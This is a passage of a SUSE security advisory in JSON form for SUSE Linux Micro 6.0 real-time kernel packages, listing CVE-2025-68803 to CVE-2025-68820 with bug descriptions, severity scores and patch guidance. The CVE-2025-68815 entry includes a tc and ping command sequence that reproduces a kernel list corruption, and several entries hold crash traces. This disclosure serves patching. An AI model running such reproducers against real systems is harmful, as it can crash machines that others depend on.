"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68810",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68810"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot\n\nReject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was\ninitially created with a guest_memfd binding, as KVM doesn\u0027t support\ntoggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling\nKVM_MEM_GUEST_MEMFD, but doesn\u0027t prevent clearing the flag.\n\nFailure to reject the new memslot results in a use-after-free due to KVM\nnot unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY\nchange is easy enough, and can/will be done as a hardening measure (in\nanticipation of KVM supporting dirty logging on guest_memfd at some point),\nbut fixing the use-after-free would only address the immediate symptom.\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm]\n Write of size 8 at addr ffff8881111ae908 by task repro/745\n\n CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x60\n print_report+0xcb/0x5c0\n kasan_report+0xb4/0xe0\n kvm_gmem_release+0x362/0x400 [kvm]\n __fput+0x2fa/0x9d0\n task_work_run+0x12c/0x200\n do_exit+0x6ae/0x2100\n do_group_exit+0xa8/0x230\n __x64_sys_exit_group+0x3a/0x50\n x64_sys_call+0x737/0x740\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7f581f2eac31\n \u003c/TASK\u003e\n\n Allocated by task 745 on cpu 6 at 9.746971s:\n kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_kmalloc+0x77/0x90\n kvm_set_memory_region.part.0+0x652/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n Freed by task 745 on cpu 6 at 9.747467s:\n kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_save_free_info+0x37/0x50\n __kasan_slab_free+0x3b/0x60\n kfree+0xf5/0x440\n kvm_set_memslot+0x3c2/0x1160 [kvm]\n kvm_set_memory_region.part.0+0x86a/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68810",
"url": "https://www.suse.com/security/cve/CVE-2025-68810"
},
{
"category": "external",
"summary": "SUSE Bug 1256679 for CVE-2025-68810",
"url": "https://bugzilla.suse.com/1256679"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68810"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
